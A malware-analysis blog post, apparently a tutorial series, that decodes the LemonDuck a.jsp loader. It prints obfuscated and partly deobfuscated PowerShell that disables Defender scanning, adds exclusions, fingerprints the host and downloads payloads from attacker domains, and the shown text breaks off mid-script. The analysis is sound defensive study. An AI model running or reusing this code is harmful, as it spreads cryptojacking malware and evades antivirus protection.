
Malware Analysis:Lemon Duck CryptoMiner (a.jsp) : Part II

This is the second article in which we analyze the LemonDuck malware. [Earlier] we analyzed the “mail.jsp” script, which resulted in the download and invocation of another script named “a.jsp”.

You can find resources related to the malware we analyze here in this GitHub repository.

⚠️ Any domains, URLs, IPs or scripts discovered while analyzing malware are malicious. I defanged these URLs to prevent any accidental click. Don’t try to visit these domains or run these scripts on your host machine; always use a sandboxed VM to perform experiments.

Stage 0

The LemonDuck malware has various phases and stages, and for them it uses different scripts such as mail.jsp, 7p.php, report.jsp and a.jsp.

We already analysed the mail.jsp script.

We have the malicious script a.jsp with us 👇🏻, which we extracted in the last article.

IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('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'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

This seems to be an encoded script. Let’s decode it and see what it does.
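The loader line above can be reproduced offline without ever handing the blob to `IEX`: it splits the hex string into two-character groups (`-split'(..)' | ?{$_}`), parses each group as a byte (`[convert]::ToUInt32($_,16)`), inflates the bytes through `IO.Compression.DeflateStream` and reads the result as ASCII. The following Python is an added example that is not part of the original post or of the LemonDuck scripts; it implements that decode chain. .NET's `DeflateStream` is raw DEFLATE with no zlib header, which Python's `zlib` exposes through a negative window size. The blob used here is constructed by compressing a harmless string; in practice the hex string copied out of a.jsp (inside the sandbox VM) is passed in its place.

```python
import re
import zlib


def decode_stage0(hex_blob: str) -> str:
    """Statically reproduce the a.jsp loader's decode chain.

    Mirrors: -split'(..)' | ?{$_} | %{[convert]::ToUInt32($_,16)}
    followed by a DeflateStream read as ASCII. wbits=-15 selects raw
    DEFLATE, the format .NET's DeflateStream produces (no zlib header).
    """
    pairs = re.findall(r"..", hex_blob.strip())       # two hex chars per byte
    data = bytes(int(pair, 16) for pair in pairs)     # same as ToUInt32($_,16)
    return zlib.decompress(data, wbits=-15).decode("ascii")


def _raw_deflate(payload: bytes) -> bytes:
    """Produce a raw-DEFLATE stream; only used to build the constructed sample."""
    compressor = zlib.compressobj(level=9, wbits=-15)
    return compressor.compress(payload) + compressor.flush()


# Constructed sample: a benign one-liner stands in for the real a.jsp blob.
SAMPLE_SCRIPT = "Write-Host 'constructed sample, not the LemonDuck payload'"
SAMPLE_BLOB = _raw_deflate(SAMPLE_SCRIPT.encode("ascii")).hex()


def sample_roundtrip() -> bool:
    """True when decoding the constructed blob gives back the original text."""
    return decode_stage0(SAMPLE_BLOB) == SAMPLE_SCRIPT


if __name__ == "__main__":
    # Swap SAMPLE_BLOB for the hex string taken from a.jsp to obtain the
    # stage 1 script as text, without executing anything.
    print(decode_stage0(SAMPLE_BLOB))
```

The decoder deliberately stops at returning text: the next layers are inspected as strings rather than run, which is the whole point of doing the decode outside PowerShell.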

Stage 1

After Decoding the Script we get

$K8n3d  =[chAR[]] " ))63]Rahc[,'TwE' ECALper- 93]Rahc[,'ImZ' ECAlPeRC-  )'

 ) )29]RaHc[,)96]RaHc[+35'+']RaHc[+311]R'+'aHc[( EcAlpEr- 43]RaHc['+',ImZAGJImZEcALPErc-69]RaHc[,)0'+'21]'+'RaHc[+8'+'4]RaHc[+001]RaHc[(EcALPEr'+'c-63]RaHc[,)96]RaHc['+'+05]RaHc[+07]RaHc[( EcAlpE'+'r- 93]RaHc[,ImZD2EImZEcAlpEr- 421]RaHc[,)011]RaHc['+'+001]RaHc[+78]RaHc[( EcAlpEr-)I'+'mZ


AGJpsj.troper/lru_erocE2FAGJ XEIS

3 sdnoceS- peelS-ImZ+ImZtratS

}

}{hcta'+'c }	

}		

}			

)setyb_warE2F]][rahc[ni'+'oj-( XEImZ+'+'ImZI				

{ ))yarrAetybE2F,1ahsE2F,setyb_warE'+'2'+'F(ataDyfirev.asrE2F(fi			

redivorPec'+'ivreSotpyrC1A'+'HS.yhpargotpyrC.ytirImZ+ImZuceS.meImZ+ImZ'+'t'+'syS tcejbO-weN = 1ahsE2F			

)46esabE2'+'F(gn'+'irtS46esaBmorF::]trevnoc[ = yarrAetybE2F			

)setyb_ngisImZ+ImZE2F]][r'+'ahc[(nioj- = 46eImZ+ImZsabE2ImZ+I'+'mZF			
'+'
)smaraPasrE'+'2F(sretemaraImZ+ImZPtropmI.asrE2F			

;redivorPecivre'+'SotpyrCASR.yhpargotpyrC.ytiruceS.metsyS emaNepImZ+ImZyT- tcejbO-weN = aImZ+ImZsrE2F			

10x0,00x0,10x0 = tneImZ+ImZnopxE.'+'smaraPasImZ+ImZrE2F			

d5x0,b6x0,74x0,7bx0,83x0,aeImZ+ImZx0,79x0,eax0,b7x0,4ax0,36x0,88x0,7fx0,5dx0,36x0,dfx0,27'+'x0,01x0,59x0,e2x0,ImZ+ImZ6fx0,f3x0,79x0,bdx0,89x0,'+'a0x0,bcx0,03x0,e6x0,93x0,fcx0,0dx0,24x0,e8x'+'0,59x0,ea'+'x0,a6x0,19x0,7ax0,04x0,97x0,dcx'+'0,21x0,2ex0,f9x0,7ax0,a8x0,87x0,43ImZ+ImZx0,7cx0,7ex'+'0,dcx0,10x0,25x0,6cx0,37x0,03'+'x0,91'+'x0,1dImZ+ImZx0,b2x0,d7x0,b9x0,e2x0,8bx0,c6x0,'+'eex0,29x0,2fx0,53x0,fbx0,88x0,c'+'dx0,06x0,1dx0,11x0,6fx0,f4x0,6ax0,dbx0,edx0,acx0,e6x0,69x0,'+'70x0,68x0,07x0,26x0,b3x0,f4x'+'0,3fx0,b6x0,73x0'+',dcx0'+',dcx0,0cx0,d3x0,25x0,c3x0,32x0,e4x0,eax0,6dx0,76x0,bex0'+',55x0,b7x0,c6x0,e6x0,37x0,a9x0,35x0,37x0,ffx0,f2'+'x0,ffx'+'0ImZ+Im'+'Z,28x0,d9x0,99x0,e5x0,14x0,d6x0,cbx0,79x0,bbx0,7ImZ+ImZdx0,8ax0,56x0,adx0'+' = suludoM.smaraP'+'as'+'rE2F			

sretemaraPASR.yImZ+I'+'mZhpargo'+'tpyr'+'C.ytiruceS.metsyS tcejbO-weN '+'= '+'smaraPasrEImZ+'+'ImZ2F			'+'

;]tnuoc.setyb_serE2F..371['+'setyb_serE2F = sImZ+ImZetyb_warE2FI'+'mZ+ImZ			

;]171..0[setyb_ImZ+ImZserE2F = setyb_ngisE2F			

{)371 tg- tnuoc.setyb_serE2F(fi		

)lrulanifE2FImZ+ImZ(ataDdaolnwoD.tneilcbewE2F = setyb_serE2F		

}{hctac }		

))D'+'2E-D2E,D2EE5qImZ+ImZD2E(ecalpImZ+ImZer.kcuD_nomeLE2F+AGJ-kcuD-nomeLAGJ,AGJtnegA-resUAGJ(dda.sredaeH.ImZ+ImZtneilcbewE2F			

{yrt		ImZ+ImZ

AGJs'+'marapE2FAGJ+AGJ?AGJ+AGJlruE2FAGJ '+'= lrulanifE2F		

tneilx0dCbeW.teN tcex0djbO-wx0deN = tneilcbewE2F		

{yrt	

)	

lruE2F]gnirts[	

(maraP	

  { XEIS noitcnuf

)AGJ&AGJnioj-)AGJ9.0AGJ,trop'+'piE2F,emImZ+ImZanptE2F,pimlE2F,f_fno'+'cE'+'2F]tnI[,eIm'+'Z+ImZmitpuE2F,ImZ+ImZrhmE2F,pimE2F,vmEImZ+ImZ2F,)AGJAGJnioj-]5ImZ+ImZ..0[5ImZ+ImZdmr'+'klE2F(,)AGJAGJnioj-]5..0ImZ+ImZ[5dmmlE2F(,)AGJAGJniImZ+ImZoj-'+']5..0[ImZ+ImZ5dmfilE2FImZ+ImZ(,t'+'imrepE2F]ImZ+ImZtImZ+ImZnI[,rep_'+'upcE2F,memE2F,ImZ+'+'ImZdra'+'cE2F,emanupcE2F,evirdImZ+ImZE2F,niamodE2F,resuImZ+ImZE2F,46siE2F]tnI[,soE2ImZ+ImZF(@(+AGJ&'+'AG'+'J=+smaImZ+ImZrapE2F

}{hctac}))D2E'+'9.9.'+'9.9'+'D'+'2EImZ+ImZ,D2E8.8.8.8ImZ+ImZD2E(@('+'redrOhcraeSrevreSSNDteS.)eurt=delbanepi retlif- noitarugifnocretpadakrowten_23niw ssalc- tcejboimw-teg({yrt

}

}    

'+'kaerb        

]2[enilE2F = troppiE2F        

{))diptE'+'2F qe- ]1-[enilE2F( dna- )AGJDEHSILBATSEAGJ(sniatnoc.tE2F(fi   '+' 

} eunitnoc {'+' )llunE2ImZ+ImZF qe- ImZ+Im'+'ZenilE2F( '+'fi    

}_'+'E2F{ ? ndW)D2E D2E(tilpImZ+ImZs'+'.tE2F = e'+'nilE2F    

{)nnocpctE2F ni tE2F(hcaerof

AGJAGJ=troppiE2F

PCT '+'pona- tatSteN = nnocpctE2F

)}e'+'manssecorp._E2ImZ+ImZF,di._E2F{hcaImZ+ImZerofndW1 '+'tsrif- ImZ+ImZtcejbo-tcelesndWg'+'ImZ+ImZnidnec'+'seD- upc trosndWssecorpImZ+ImZ-tIm'+'Z+ImZ'+'eg(=em'+'anptE2F,diptE2F

} gnirtSoTsserddAPI._E2F ohce{ hcaerof ndW )AGJmoc.qk'+'96b.pAGJ(sesserddAts'+'oHteG::]snD.teN.'+'metsyS[=pimlE'+'2F

nosj'+'.'+'1XXXgImZ+ImZifnocE5q0.1vE5qlleImZ+ImZhSrewoPswodniWE5q23metsysE5qswodniwE5q:c ht'+'ap-tset=f_fnoc'+'E2F


)D2E- D2E+emaImZ+ImZnerE2F+D2En'+'dW}{hctac}}{)1(elihw;)(trats.sE2F'+';92556]renetsiLpcT.'+'stekcoS.'+'tImZ+Im'+'ZeN.metsyS[=s'+'E2F{yrt ohceD2EImZ+ImZ( pts

}

))emanerE2FImZ+ImZ bpg(+)nibrkE2F 5dmrkE2F 4edocE2F fcg(( pts	

{)r'+'Klaco'+'lE2F('+'fi

4edocE2F x'+'Ex0dI

AGJrKAGJ eImZ+ImZ'+'docg=4edocE2F

}

}	

))eman'+'erE2F ImZ+ImZnib'+'gmE2F apg(+)nibgmE2F 5dmgmE2F 3edocE2F fcg(( pts		

{)gnMTlacolE2F(fi	

3edocE2'+'F xEx0dI	

AImZ+ImZGJgnMTAGJ edocg=3edocE2F	
'+'
{)46siE2F dna- )asiE2F ro- nsiE2F((fi'+'

}

}'+'	

))emaner'+'E2F '+'nibmE2F a'+'p'+'g(+)nibmE2F 5dImZ+ImZm'+'mE2F 2edocE2F fcg(( pts		

{)nMTlacolE'+'2F(ImZ+I'+'mZfi	

2edocE2F xEx0dI	

AGJnMTAGJ edocg=2edoImZ+ImZ'+'cImZ+ImZE2F	

{)46siE2F(f'+'i

}

))emanerE2F bpg(+)nibfiE2F 5ImZ+ImZdmfiE2F 1edocE2F fcg(( pImZ+ImZts	

{)fIlacolE2F(fi

1edocE2F xEx0dI

AGJfIAGJ edocg='+'1edocImZ+ImZ'+'E2F

}

D2E}{hctac})D2E'+'+lfE2F+D2ElacolE2F]fer[,D2ED2ED2E+lfE2F+D2E'+'lacoLeE5qlabolGD2ED2E,eurtE2F(xetuM.gnidaerhT tcejbO-we'+'N;esa'+'lfE2F=D2E+lfE2F+D2ElacolE2F{yrtD2E	

{'+' )lfE2F(edocg noitcnuf

}

D2E- D2E+'+'emanE2F+D2End'+'W)nocE2F]][rahc[nioj-(XEx'+'0dID2E    '+'

{)ImZ+Im'+'ZemanE2F(bpg noitImZ+ImZcnuf'+'

}

AGJexe.manfE2FE5q%pmt% & exe.manfE2FE5q%pmt% iro.manfE2FE5q%ImZ+ImZpmt% y/ ypoc c/ dmc& - emanE2ImZ+ImZFndWAGJ+)D2E&^^^D2E,'+'D2EImZ+ImZ&D2E(ecalp'+'er.'+')'+'D2EndW^^^D2E,D2EndWD2E(ecalper.)'+'D2EnibE2F setyBEP- '+'1tset;))001 tnuoC- modnaR-teGndW)721..1'+'((+_nibE2F,pemE2F(se'+'tyBllAeti'+'rW::]eliF.OI.metsyS[;D2ED2ED2E+AGJiro.manfE2FE5qImZ+ImZAGJ+D2ED2ED2EImZ+ImZ+pmt:v'+'neE2F=pemE2F;)(enolC.nibE2F=_nibE2F;ImZ+ImZ)00000001(setyBdaeR.)))sserpmoceD::]edoMnoisserpmoC.noisse'+'rpmoC.OI[(ImZ+I'+'mZ ,))])tnuoc.nocE2F(..)1+iE2F([nocE2F,(maert'+'SyromeM.OI.metsyS tc'+'ejImZ+ImZbO-weN( maertSpizG.'+'noisserpmImZ+ImZoC.OI.metsyS tcejbO-weN(redaeRyrani'+'B.OI tcejbO-ImZ+ImZweN(=nibE2F;)]iE2F..0[no'+'cE2F'+']][rahc[nioj-(xex0di;}}kImZ+ImZaerb{)a'+'0x0'+' qe- ]iE2F[noc'+'E2F(fi{)1=+iE2F;1-I'+'mZ+ImZtnu'+'oc.nocE2F tl- iE2F;0=ImZ'+'+ImZiE2F(rofD2E(	

{)emanE2'+'F,manfE2F(apg noitcnuf

}

)'+'ImZ+ImZD2E&^^^D2E,D2E&D2E(e'+'calper.)D2EndW^^^D2E,D2End'+'WD2E(ecalper.)D2E}_5dmE2F=5dmfiE2F;_n'+'ocE2F=nocE2F{)puonE2FIm'+'Z+'+'ImZ(fi}ImZ+ImZ}1=puonE2F{esImZ+'+'ImZle})nocE2F,pfiE2F(setyBllImZ+ImZAetirW::]e'+'liF.OI.'+'metsyS[{)5dmfiE2Fqe-'+'tE2F(fi;nocE2F 5dmg=tE2F;)D2ED2ED2E+'+'sm'+'arapE2F+D2E?D2E+nfE2F+D2E/D2EImZ+Im'+'ZD2E+lr'+'u_nwodE2FImZ+ImZ(ataddaolnwod.)tneilx0dCbeW.ImZ+I'+'mZteN tcex0djbO-wx0deN(=nocE2F{)puonE2F!(fi}}1='+'puonE2F{)5dmfiE2Fqe-_5dmE2F(fi;_nocE2F 5dmg=_5'+'dmE2F;'+')pfiE2F(setyBllAdaeR::]eliF.OI.metsyS[=_nocE2F{)pfiE2F htap-tset(fi}sEImZ+ImZ2F nrute'+'r;})D2ED2E2xD2ED2E(gnirtSoT._E2F=+sE2F{hcaerofndW)nocImZ+ImZE2F(hsaHe'+'tupmo'+'C.)(etaerC::]5DM.yhpargotpyrC.ytiruceS.metsyS[{)nocE2F(5dmg noitcnuf;ImZ+ImZD2ED'+'2ED2E+lru_nImZ'+'+ImZwodE2F+D2ImZ+ImZED2ED2EImZ+ImZ=lru_nwodE2F;D2ED2ED2E+nfE2F+D2EE5qD2ED2ImZ+ImZE+pmt:vneE'+'2F=pfiE2F;D2ED2ED2E+dmE2F+D2ED2ED2E=5dmfiE2F;D'+'2E+edocE2F+D2E ohceD2'+'E'+'(	

{)nfE2F,dmE2F,edocEI'+'mZ+ImZ2F(fcg noitcnuf

}

AGJargE2F c/AGJ ts'+'iLtnemugrA- exe.dmc htaP'+'eliF- ssecorP-tratS	

argE2ImZ+ImZF'+' tsoh-etirw    

{)arg'+'E2F(ptImZ+ImZs noiImZ+ImZtcnuf

pmt:vneE2F noitImZ'+'+ImZacol-tes



AGJ&AGJnioj-)camE2F,dImZ+'+'ImZiugE2F,eman_pmocE2F,vE2F(@='+'smarapE2F

]1[)AGJ?AGJ(tilps.lruE2F=vE2F

}1=asiE2F{))AGJDMAndWnoedaRAGJ hctam- dracE2F((fi

}1=nsiE2F{))AGJECROFEGndWAIDIVNndWXTGAGJImZ+ImZ hctam- '+'d'+'racE2F((f'+'i
ImZ+ImZ
}{hctac'+'}ImZ+ImZ

emanImZ+ImZerE2FE5q0.1vE5qllehSrImZ+ImZewoPswodniWEImZ+ImZ5q23metsysE5qswodni'+'wE5q:c ssecorPnoisulcxE- ecnereferPpImZ+ImZM-ddA    

ImZ+ImZexe.llehsrewoImZ+ImZpE5q0.1vE5qImZ+ImZllehSrewoPswodniWE5q23metsysE5qswodniwE5q:c ssecorPnoImZ+ImZisulcxE- ecnereferPpM-ddA	

E5q:c htaPnoisulcxE- ecneref'+'erPpM-ddA	

1 gnirotinoMemitlaeImZ+ImZRelbasiD- ecnerImZ+ImZeferPpM-teS	

{yrt

}{hctac})'+'D2E,D2E(nioj-latoImZ+ImZt.etarhsah.jboE2F=rhmE2FIm'+'Z+Im'+'Z
ImZ+ImZ
pi.n'+'oi'+'tcennoc.jboE2F=pimE2F

no'+'isrev.jboE2F=vmE2F

))D2'+'Eyrammus/1/96634:1.0.0.721//:ptt'+'hD2E(AGJImZ+ImZgnirtsdao'+'lnwodAGJ.)tneilx0dcbew.ten tcex0djbo-ImZ+ImZwx0den((tcejbOezilaireseD.)rezilaireStpircSavaJ.noitazilaireS.tpircS.beW tcejbO-weN( = jboE2F

)AGJsIm'+'Z+ImZno'+'isnetxE.beW.metsySAGJ(emaNlaitImZ+ImZraPhtiWdaoL::]ylbm'+'essA.noitcelfeR['+'

{yrt

}{h'+'ctac}AGJn'+'dWAGJnioj-)}]0[))(gnirtso'+'t.epyTeviImZ+ImZrD._E2F(ImZ+ImZ+AGJ_AGJ+]0[)emaN._E2F({hcaerof ndW }))AGJ23TAFAGJ qe'+'- tamroFevirD._E2F( ro- )AGJSFTNAGJ'+' qe- tamroFevirD._E'+'2F(( dna- ))AGJkrowteN'+'AGJ qe'+'- epyTevirD._E2F( '+'ro- )AGJelbavomeRAGJ qeImZ+I'+'mZ- epyTevirD._E2'+'F(( dna'+'- )4201 tg- ecapSeerFelbaliavA._E2'+'F( dna- ydaeRsI._E2F{ erehw ndWImZ+ImZ )ImZ+ImZ(sevirDteG::'+']ofnIevirD.OI.metsys[( = evi'+'rdE2F

{yrt

bG1/musImZ+ImZmE2F=memE2F;} yticapaC._E2F =+ musmE2F { }0 = musmE2F{\% ndW yromeMImZ+ImZlacisyhP'+'_23niW imwg

AGJ)egatnecre'+'PdaoL.)rossecoImZ+ImZrP_23niW ssalCImZ+ImZ- ImZ+ImZtcejbOimW-teG((E2FAGJ = rep_'+'u'+'pcE2F

eman.)rellortnoCoediV_23'+'niW tcejbOimW-teG( = dracE2F

eman.)ro'+'ssecorp_23niwImZ+ImZ tcejboimw-teg( = emanup'+'cE2F

}sdnoceslatot._'+'E2F{hcaerofndW)tnuoCkciT::]tnemnorivne[(sd'+'nocesilliMmo'+'rF::]napsemit[ = emitpuE2F

nia'+'moD.)'+'meImZ+ImZtsysreImZ+Im'+'Ztupmoc_23niw'+' '+'tImZ+ImZcejbOimW-teG( = niamodE2FImZ'+'+ImZ

EMANRESU:'+'vneE2F = resuE2F

noisreV.bsoE2F+AGJ_AGJ+)AGImZ+ImZJAGJ,'+'AGJ swodni'+'W '+'tfosorciMA'+'GImZ+ImZJ(ecalper.noitp'+'aC.bso'+'E2F = soE2F

)metsySgnitarepO_'+'23niW ssalc- t'+'cejbOiImZ+ImZm'+'W-teG( = bsoE2'+'ImZ+ImZF

1 tImZ+ImZsrif- tcejbo-tceles ndW sserddacaM.)}eurtE2F QE- delbanepi._E2F{ erehw ndW noImZ+ImZitaImZ+ImZrugifnoCretpa'+'dAkrowteN_23niW tcejbOim'+'W-teG( = camE2F

DI'+'UU.)tcudorPmImZ+ImZetsySretupmoC_23n'+'iW tcejboimw-t'+'eg( = diugE2F

EMANRETUPMOC:vneE2'+'F = eman_pmocE2F

)AGJrotartsinimdAA'+'GJ ]ImZ+ImZeloRnItliuBswodniImZ+ImZW.lapicnirP.ytir'+'uceS[(eloRnIsI.'+'))(tnerImZ+ImZruCteG::]ytitnedIswodniW.lapicnir'+'ImZ+ImZP.ytiruceS[]'+'lapicnirPswodniW.lapicnirP.ytiruceS'+'[( = timrepE2F


AGJ/A'+'GJnioj-]'+'2..0[)AGJ/A'+'GJ(tilps.lruE'+'2F = lru_erocE2F

}AGJmoc.9u3'+'bb.t//:ptthAGJ=lruE2F{)lr'+'uE2F!(fi

AGJmocImZ+ImZ.uImZ+ImZdjw87u.d//:ptthAGJ = lru_nwodE2F
'+'
'+'


}{hctac}))AGJnibrkE2FE5qpmImZ+ImZt:vImZ+ImZnImZ+ImZeE2FAGJ(seImZ+ImZtyBl'+'ImZ+ImZlAdaeR::]eliF.OI[( ImZ+ImZ5dmg=5dmrklE2F{yrt

}{hctac}))AGJnibmE2'+'FE5qpmt:vneE2FAGJ(s'+'etyBllAdaeR::'+']eliF.OI[( 5dmg=5dmmlE2ImZ+ImZF'+'{yrt

}{hctac}))AGJnibfiE2FE5qpmt:vneE2FAGJ(setyBllAdaeR::]eliF.OI[( 5dmg=5dmfilE2F{yrt

AGJAGJ,AGJAGJ,AGJAGJ'+'=5dmrklEImZ+ImZ2F,5dmmlE2F,5dmfilE2F

emanrteg=emanerE2F

}

e'+'maneE2F ImZ+ImZnruter    

}AGJexe.llehsrewImZ+ImZopAImZ+ImZGJ=emaneE2F{))AGJemaneE2FE5qhtaprE2FAGJImZ+ImZ hta'+'p-tset(!(fi    

llun-tuondWA'+'GJemaneE2FE5qhtaprE2FA'+'GJ AGJe'+'xe.llI'+'mZ+ImZehsrewopE5qhtaprImZ+ImZ'+'E2FAGJ meti-y'+'poc    

AGJexe.AGJ + '+'))'+'6%)modnaR-teG(+6( tnu'+'oC- modnaR-ImZ+ImZteGndW)2ImZ+ImZ21..79+09..56+75..84(]][rahc[(n'+'ioj-=emaneE2F    

}    

}        

ImZ+ImZemaneImZ+ImZE2F nruter        ImZ+I'+'mZ    

{)_'+'5dmE2'+'F '+'qe- 5dmtE2F(fi        

))AGJemaneE2FE5'+'qhtaprE2'+'FA'+'GJ(setyBllAdaeR::]eliF.OI[( 5dImZ+ImZmg=_5dmE2F       ImZ+ImZ 

{)semaneE2F ni emaneE2F(hcaerof ImZ+ImZ   

))AGJexe.lle'+'hsrewopE5qh'+'taprE2FAGJ(setyBllA'+'daeR::]eliF.OI[( 5dmg = 5ImZ+I'+'mZdmtE2F    

}eman._E2F{hcaerofndWexe.llehsrewop edulcxE- exe.'+'* edulcnI- A'+'GJ*E5qhtaprE2FAGJ icg = semaneE2F    

AGJ0.1VE5qllehsrewopswodniWE5q23metsyImZ+ImZSE5qswodniWE5q:CAGJ=h'+'taprE2F    

{)(emanrteg noitcnuf

}

lE2F nruter	ImZ+ImZ

})D2E2xD2E(gnirtSoT._E2F=+lE2F{hcaerofndW)dE2F(hsaHetupmoC.)(etaerC::]5D'+'M.ImZ+ImZyhpargotpyrC.ytiruceS[	'+'

{)dE2F(5dmg noitcnuf

}

'+'AGJ31869c5772bc25ea69e32292a97d0c62AGJ=5dmgmE2F	

AGJnib.g6mAGJ=nibgmE'+'2F	

AGJ3d9aa5ImZ+ImZ5c53e66d'+'dfae7021e100a09323AGJ=5dmmE2'+'F'+'	

AGJnib.6mA'+'GJ=nibmE2F	

{)46sImZ+ImZiE2F(fi

AGJ6aaa5cad88365817f16316647dfc1a7bA'+'GJ=5dmrkE2F

AGJnib.rkAGJ=nibrkE2F

AG'+'Jf6eff1a9dd5e47ImZ+ImZ0f343207213dImZ+ImZdf9f40AGJ=5dmfiE2F

AGJnib.fiAGJ=nibfiE2F

)8 qe- ez'+'iS:ImZ+I'+'mZ:]rtPtnI[(]tni[=46siE2FImZ(( ( )'+'ImZI'+'mZNi'+'Oj-I'+'mZxImZ+]3,1[)eCnEREfERPesOBR'+'EvTwE]GnirTS[( (. '(( ( )'x'+]31[DILlehS$+]1[diLlEHs$ (&" ; [ARRay]::Reverse( $k8n3D) ;  ( " $( sV 'ofS' '') " + [sTRing]( $k8n3D) +" $(set-variAbLe  'Ofs' ' ' )") 

This seems to be obfuscated code.

So let’s try to deobfuscate the script.

Stage 2

The payload we obtained is

( ((' .( ([STrinG]EwTvE'+'RBOsePREfEREnCe)[1,3]+ZmIxZm'+'I-jO'+'iNZm'+'IZmI'+') ( ((ZmIF2Eis64=[int]([IntPtr]:Zm'+'I+ZmI:Si'+'ze -eq 8)

F2Eifbin=JGAif.binJGA

F2Eifmd5=JGA04f9fdZmI+ZmId312702343f0ZmI+ZmI74e5dd9a1ffe6fJ'+'GA

F2Ekrbin=JGAkr.binJGA

F2Ekrmd5=JG'+'Ab7a1cfd74661361f71856388dac5aaa6JGA

if(F2EiZmI+ZmIs64){

F2Embin=JG'+'Am6.binJGA

'+'F'+'2Emmd5=JGA32390a001e1207eafd'+'d66e35c5ZmI+ZmI5aa9d3JGA

F2'+'Emgbin=JGAm6g.binJGA

F2Emgmd5=JGA26c0d79a29223e96ae52cb2775c96813JGA'+'

}

function gmd5(F2Ed){

'+'[Security.CryptographyZmI+ZmI.M'+'D5]::Create().ComputeHash(F2Ed)Wdnforeach{F2El+=F2E_.ToString(E2Dx2E2D)}

ZmI+ZmIreturn F2El

}

function getrname(){

    F2Erpat'+'h=JGAC:q5EWindowsq5ESZmI+ZmIystem32q5EWindowspowershellq5EV1.0JGA

    F2Eenames = gci JGAF2Erpathq5E*JG'+'A -Include *'+'.exe -Exclude powershell.exeWdnforeach{F2E_.name}

    F2EtmdZm'+'I+ZmI5 = gmd5 ([IO.File]::Read'+'AllBytes(JGAF2Erpat'+'hq5Epowersh'+'ell.exeJGA))

   ZmI+ZmI foreach(F2Eename in F2Eenames){

 ZmI+ZmI       F2Emd5_=gmZmI+ZmId5 ([IO.File]::ReadAllBytes(JG'+'AF'+'2Erpathq'+'5EF2EenameJGA))

        if(F2Etmd5 -eq'+' F'+'2Emd5'+'_){

    Zm'+'I+ZmI        return F2EZmI+ZmIenameZmI+ZmI

        }

    }

    F2Eename=-joi'+'n([char[]](48..57+65..90+97..12ZmI+ZmI2)WdnGetZmI+ZmI-Random -Co'+'unt (6+(Get-Random)%6'+'))'+' + JGA.exeJGA

    cop'+'y-item JGAF2E'+'ZmI+ZmIrpathq5EpowersheZmI+Zm'+'Ill.ex'+'eJGA JG'+'AF2Erpathq5EF2EenameJG'+'AWdnout-null

    if(!(test-p'+'ath ZmI+ZmIJGAF2Erpathq5EF2EenameJGA)){F2Eename=JGZmI+ZmIApoZmI+ZmIwershell.exeJGA}

    returnZmI+ZmI F2Eenam'+'e

}

F2Erename=getrname

F2Elifmd5,F2Elmmd5,F2ZmI+ZmIElkrmd5='+'JGAJGA,JGAJGA,JGAJGA

try{F2Elifmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EifbinJGA))}catch{}

try{'+'FZmI+ZmI2Elmmd5=gmd5 ([IO.File]'+'::ReadAllByte'+'s(JGAF2Eenv:tmpq5EF'+'2EmbinJGA))}catch{}

try{F2Elkrmd5=gmd5ZmI+ZmI ([IO.File]::ReadAlZmI+ZmI'+'lBytZmI+ZmIes(JGAF2EeZmI+ZmInZmI+ZmIv:tZmI+ZmImpq5EF2EkrbinJGA))}catch{}


'+'
'+'
F2Edown_url = JGAhttp://d.u78wjdZmI+ZmIu.ZmI+ZmIcomJGA

if(!F2Eu'+'rl){F2Eurl=JGAhttp://t.bb'+'3u9.comJGA}

F2Ecore_url = F2'+'Eurl.split(JG'+'A/JGA)[0..2'+']-joinJG'+'A/JGA


F2Epermit = (['+'Security.Principal.WindowsPrincipal'+'][Security.PZmI+ZmI'+'rincipal.WindowsIdentity]::GetCurZmI+ZmIrent())'+'.IsInRole([Secu'+'rity.Principal.WZmI+ZmIindowsBuiltInRoleZmI+ZmI] JG'+'AAdministratorJGA)

F2Ecomp_name = F'+'2Eenv:COMPUTERNAME

F2Eguid = (ge'+'t-wmiobject Wi'+'n32_ComputerSysteZmI+ZmImProduct).UU'+'ID

F2Emac = (Get-W'+'miObject Win32_NetworkAd'+'apterConfigurZmI+ZmIatiZmI+ZmIon Wdn where {F2E_.ipenabled -EQ F2Etrue}).Macaddress Wdn select-object -firsZmI+ZmIt 1

FZmI+ZmI'+'2Eosb = (Get-W'+'mZmI+ZmIiObjec'+'t -class Win32'+'_OperatingSystem)

F2Eos = F2E'+'osb.Ca'+'ption.replace(JZmI+ZmIG'+'AMicrosoft'+' W'+'indows JGA'+',JGAJZmI+ZmIGA)+JGA_JGA+F2Eosb.Version

F2Euser = F2Eenv'+':USERNAME

ZmI+'+'ZmIF2Edomain = (Get-WmiObjecZmI+ZmIt'+' '+'win32_computZ'+'mI+ZmIersystZmI+ZmIem'+').Dom'+'ain

F2Euptime = [timespan]::Fr'+'omMillisecon'+'ds([environment]::TickCount)Wdnforeach{F2E'+'_.totalseconds}

F2Ec'+'puname = (get-wmiobject ZmI+ZmIwin32_process'+'or).name

F2Ecard = (Get-WmiObject Win'+'32_VideoController).name

F2Ecp'+'u'+'_per = JGAF2E((Get-WmiObjectZmI+ZmI -ZmI+ZmIClass Win32_PrZmI+ZmIocessor).LoadP'+'ercentage)JGA

gwmi Win32_'+'PhysicalZmI+ZmIMemory Wdn %{F2Emsum = 0} { F2Emsum += F2E_.Capacity };F2Emem=F2EmZmI+ZmIsum/1Gb

try{

F2Edr'+'ive = ([system.IO.DriveInfo]'+'::GetDrives(ZmI+ZmI) ZmI+ZmIWdn where {F2E_.IsReady -and (F'+'2E_.AvailableFreeSpace -gt 1024) -'+'and ((F'+'2E_.DriveType -Zm'+'I+ZmIeq JGARemovableJGA) -or'+' (F2E_.DriveType -'+'eq JGA'+'NetworkJGA)) -and ((F2'+'E_.DriveFormat -eq '+'JGANTFSJGA) -or (F2E_.DriveFormat -'+'eq JGAFAT32JGA))} Wdn foreach{(F2E_.Name)[0]+JGA_JGA+ZmI+ZmI(F2E_.DrZmI+ZmIiveType.t'+'ostring())[0]})-joinJGAWd'+'nJGA}catc'+'h{}

try{

'+'[Reflection.Asse'+'mbly]::LoadWithParZmI+ZmItialName(JGASystem.Web.Extensi'+'onZmI+Z'+'mIsJGA)

F2Eobj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((ned0xwZmI+ZmI-objd0xect net.webcd0xlient).JGAdownl'+'oadstringZmI+ZmIJGA(E2Dh'+'ttp://127.0.0.1:43669/1/summaryE'+'2D))

F2Emv=F2Eobj.versi'+'on

